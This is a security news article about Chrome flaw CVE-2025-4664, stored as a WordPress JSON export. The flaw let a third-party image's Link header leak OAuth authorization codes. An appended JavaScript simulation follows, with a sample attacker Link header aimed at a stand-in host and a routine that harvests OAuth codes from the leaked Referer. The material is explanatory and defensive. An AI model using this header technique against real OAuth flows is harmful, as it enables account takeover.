{"id":3201,"date":"2025-05-15T19:05:00","date_gmt":"2025-05-15T19:05:00","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=3201"},"modified":"2025-05-15T19:05:00","modified_gmt":"2025-05-15T19:05:00","slug":"google-patches-chrome-vulnerability-used-for-account-takeover-and-mfa-bypass","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=3201","title":{"rendered":"Google patches Chrome vulnerability used for account takeover and MFA bypass"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<p>Chrome users are advised to update their browser immediately to fix a high-severity vulnerability that is being exploited in the wild and can be used for account takeover attacks.<\/p>\n<p>In some environments, this could even give attackers the ability to bypass multi-factor authentication (MFA).<\/p>\n<p>The recently reported vulnerability, one of four fixed in a Wednesday update, is tracked as CVE-2025-4664 and affects all versions of Chrome prior to version 136.0.7103.113.<\/p>\n<p>Google\u2019s <a href=\"https:\/\/chromereleases.googleblog.com\/2025\/05\/stable-channel-update-for-desktop_14.html\" target=\"_blank\" rel=\"noopener\">advisory<\/a> rates the flaw High and says very little about it beyond stating, \u201cGoogle is aware of reports that an exploit for CVE-2025-4664 exists in the wild.\u201d<\/p>\n<p>That explains the urgency of the fix being issued outside the normal update cycle, an \u2018emergency patch\u2019 if you like. 
These come along occasionally, and given the daily use of browsers, are always a priority for users and admins alike.<\/p>\n<h2 class=\"wp-block-heading\">The vulnerability up close<\/h2>\n<p>The researcher who discovered the flaw, Vsevolod Kokorin of Neplox Security, offers a deeper dive on the issue in <a href=\"https:\/\/x.com\/slonser_\/status\/1919439373986107814\" target=\"_blank\" rel=\"noopener\">his post<\/a> on X (formerly Twitter):<\/p>\n<p>\u201cUnlike other browsers, Chrome resolves the Link header on subresource requests. But what\u2019s the problem? The issue is that the Link header can set a referrer-policy. We can specify unsafe-url and capture the full query parameters,\u201d he wrote.<\/p>\n<p>Link headers let a website tell the browser about resources it should fetch early, for example an image declared with rel=preload. Because the header arrives with the HTTP response, before the browser has parsed any HTML, preloading shortens page load times. When the browser fetches the preloaded resource, often from a third-party server, it attaches a Referer header naming the page that requested it, and the referrer policy decides how much of that page\u2019s URL is sent: Chrome\u2019s default policy trims a cross-origin referrer down to the origin, whereas unsafe-url sends the full URL, query string included.<\/p>\n<p>The flaw is that Chrome also honoured Link headers, and the referrerpolicy attribute they can carry, on responses to subresource requests such as images, not only on the response for the page itself. A third-party server asked for one image can therefore reply with a Link header that preloads a second resource with referrerpolicy set to unsafe-url, and Chrome will issue that request with the full URL of the page currently being viewed. If that page is the redirect target of an <a href=\"https:\/\/www.csoonline.com\/article\/562635\/what-is-oauth-how-the-open-authorization-framework-works.html\">OAuth<\/a> flow, the query string can carry values with a bearing on security, such as the authorization code.<\/p>\n<p>\u201cQuery parameters can contain sensitive data \u2014 for example, in OAuth flows, this might lead to an Account Takeover. Developers rarely consider the possibility of stealing query parameters via an image from a third party resource \u2014 which makes this trick surprisingly useful sometimes,\u201d wrote Kokorin.<\/p>\n<h2 class=\"wp-block-heading\">How could this be exploited?<\/h2>\n<p>OAuth provides a way of granting access to a resource without handing over a password. 
It\u2019s useful in multiple scenarios, for example, in single sign-on (<a href=\"https:\/\/www.csoonline.com\/article\/510713\/sso-explained-single-sign-on-definition-examples-and-terminology.html\">SSO<\/a>). Users might also encounter it when giving a contact access to a file or document in a cloud service such as Microsoft 365 without passing on their account credentials.<\/p>\n<p>Importantly, the OAuth redirect happens after the user has satisfied <a href=\"https:\/\/www.csoonline.com\/article\/563753\/two-factor-authentication-2fa-explained.html\">MFA<\/a>, so an attacker who captures the authorization code or token carried in that redirect URL can finish the flow as the victim without ever being challenged for a second factor. Whether a stolen code is usable depends on the client: codes are single-use and short-lived, and the token exchange may require a client secret or a PKCE verifier the attacker does not have.<\/p>\n<p>To be clear, the flaw Kokorin discovered is not that Chrome put secrets into URLs; OAuth redirects already carry them. What Chrome got wrong was letting a third-party subresource response pick the referrer policy, so that a page whose URL still held such a value would leak the whole URL to a server the attacker controls. The attacker needs only to get a response they control, typically an image, loaded by that page, for instance through user-supplied images or embedded third-party content on the page that receives the redirect.<\/p>\n<p>Probably not coincidentally, recent weeks have seen a spate of sometimes elaborate attacks attempting to do just this, as <a href=\"https:\/\/www.volexity.com\/blog\/2025\/04\/22\/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows\/\" target=\"_blank\" rel=\"noopener\">documented<\/a> by security vendors. Those campaigns rely on social engineering rather than a browser bug, and they might or might not be related to the exploitation Google mentions in its alert.<\/p>\n<p>The Google update also itemizes one other high-severity flaw, CVE-2025-4609, which, as far as the company knows, is not being exploited. The final two fixes are not itemized, which in Chrome release notes usually means they came from Google\u2019s own internal audits and fuzzing.<\/p>\n<p>Enterprises looking to patch the vulnerability should look for versions 136.0.7103.113\/.114 for Windows and Mac, and\u00a0136.0.7103.113\u00a0for Linux. Chromium-based browsers such as Edge and Brave ship the same fix on their own schedules and need checking separately.<\/p>\n<p>Enterprises should always triage this type of flaw carefully. They need to patch it quickly, but how quickly depends on the likelihood of their being targeted by the exploit.<\/p>\n<p>That risk will currently be modest. 
However, Google\u2019s advisory does not say who is exploiting the flaw or how widely. The only attribution on offer is circumstantial: the Russian threat actors documented phishing for OAuth codes by other means. Once a technique like this is public it rarely stays with one group, so the patch should not wait for the next routine update cycle.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Chrome users are advised to update their browser immediately to fix a high-severity vulnerability that is being exploited in the wild and can be used for account takeover attacks. In some environments, this could even give attackers the ability to bypass multi-factor authentication (MFA). The recently reported vulnerability, one of four fixed in a Wednesday update, is tracked as CVE-2025-4664 and affects [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-3201","post","type-post","status-publish","format-standard","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3201"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3201"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3201\/revisions"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3201"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
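The Link header trick described under "The vulnerability up close" and the OAuth account-takeover scenario under "How could this be exploited?", modelled as an added example. This is not code from the article, from Kokorin's post, or from Chromium: it reimplements the relevant part of the referrer-policy rules in plain JavaScript and shows what a pre-fix Chrome would put in the Referer header for a preload triggered by a Link header on a third-party image response, next to what the default policy would have sent. The callback URL, the authorization code, the attacker host and the header values are constructed samples, and the referrer-policy function assumes both ends are https, so the spec's downgrade branches never apply.

```javascript
// Added example, not code from the article, from Kokorin, or from Chromium.
// It models the Referer a pre-fix Chrome would attach to a preload triggered
// by a Link header on a third-party image response, as Kokorin's post
// describes, next to what the default referrer policy would have sent.
// All URLs, header values and the OAuth code below are constructed samples.

// Parse an HTTP Link header value such as
//   <https://host/p.png>; rel=preload; as=image; referrerpolicy=unsafe-url
// into [{ url, params: { rel, as, referrerpolicy, ... } }, ...].
function parseLinkHeader(header) {
  const links = [];
  for (const part of header.split(/,\s*(?=<)/)) {
    const m = part.match(/^<([^>]*)>\s*(.*)$/);
    if (!m) continue;
    const params = {};
    for (const p of m[2].split(";")) {
      const i = p.indexOf("=");
      const k = (i < 0 ? p : p.slice(0, i)).trim().toLowerCase();
      const v = (i < 0 ? "" : p.slice(i + 1)).trim().replace(/^"(.*)"$/, "$1").toLowerCase();
      if (k) params[k] = v;
    }
    links.push({ url: m[1], params });
  }
  return links;
}

// Referer value for a request from documentUrl to targetUrl under a referrer
// policy. Covers the policies relevant here and assumes both URLs are https,
// so the "downgrade" branches of the spec never apply. Fragments are never sent.
function refererFor(documentUrl, targetUrl, policy) {
  const doc = new URL(documentUrl);
  const sameOrigin = doc.origin === new URL(targetUrl).origin;
  const originOnly = doc.origin + "/";
  const full = doc.origin + doc.pathname + doc.search;
  switch (policy) {
    case "no-referrer": return null;
    case "origin":
    case "strict-origin": return originOnly;
    case "same-origin": return sameOrigin ? full : null;
    case "origin-when-cross-origin": return sameOrigin ? full : originOnly;
    case "no-referrer-when-downgrade":
    case "unsafe-url": return full;
    default: // "" or strict-origin-when-cross-origin, Chrome's default
      return sameOrigin ? full : originOnly;
  }
}

// What the browser sends for each preload named in the image response's Link
// header. vulnerable=true models pre-fix Chrome, which honoured the header and
// its referrerpolicy on a subresource response; false models the fixed build,
// which ignores it there.
function simulatePreloadLeak(documentUrl, imageResponseHeaders, vulnerable = true) {
  const leaks = [];
  const link = imageResponseHeaders["link"];
  if (!vulnerable || !link) return leaks;
  for (const { url, params } of parseLinkHeader(link)) {
    if (params.rel !== "preload") continue;
    leaks.push({ preloadUrl: url, referer: refererFor(documentUrl, url, params.referrerpolicy || "") });
  }
  return leaks;
}

// The OAuth values an attacker would harvest from a Referer hitting their server.
function harvestOAuthParams(referer) {
  const out = {};
  if (!referer) return out;
  const q = new URL(referer).searchParams;
  for (const k of ["code", "state", "access_token", "id_token"]) {
    if (q.has(k)) out[k] = q.get(k);
  }
  return out;
}

// Constructed sample: the victim lands on an OAuth callback with the code in the query.
const VICTIM_URL = "https://app.example/oauth/callback?code=c0de-constructed-sample&state=xyz123";
// Constructed sample: headers on the third-party image that page embeds, chosen by the attacker.
const ATTACKER_IMAGE_HEADERS = {
  "content-type": "image/png",
  "link": "<https://attacker.example/collect.png>; rel=preload; as=image; referrerpolicy=unsafe-url",
};

function demo() {
  const [leak] = simulatePreloadLeak(VICTIM_URL, ATTACKER_IMAGE_HEADERS);
  console.log("default policy would send:", refererFor(VICTIM_URL, leak.preloadUrl, ""));
  console.log("vulnerable preload sends:  ", leak.referer);
  console.log("attacker harvests:         ", harvestOAuthParams(leak.referer));
  console.log("fixed Chrome preloads:     ", simulatePreloadLeak(VICTIM_URL, ATTACKER_IMAGE_HEADERS, false));
}
demo();
```

Run it with `node` and the contrast is the whole bug: under Chrome's default policy the cross-origin preload would carry only `https://app.example/`, but with the attacker's `referrerpolicy=unsafe-url` honoured on a subresource response it carries the full callback URL, code and state included. The defender-side lesson that follows from the model is that a page which still has an authorization code in its URL should exchange the code server-side and redirect to a clean URL before it renders anything that pulls in third-party resources.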